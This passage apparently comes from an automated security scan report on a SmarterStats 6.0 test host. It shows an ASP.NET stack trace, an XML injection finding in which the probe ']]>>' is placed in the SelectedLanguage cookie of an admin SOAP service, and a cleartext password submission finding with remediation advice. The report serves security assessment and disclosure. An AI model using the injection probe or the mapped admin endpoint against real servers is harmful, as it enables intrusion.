The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=]]>>; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:19 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25952
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneID:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTPResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTPResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTPResult&gt;
&lt;/AddSiteWithFTPResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTPResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTPResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTPResult&gt;
&lt;/AddSiteWithFTPResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font 
class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

4. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmEmailReportSettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Admin/frmEmailReportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:24 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8426



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Email Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmEmailReportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
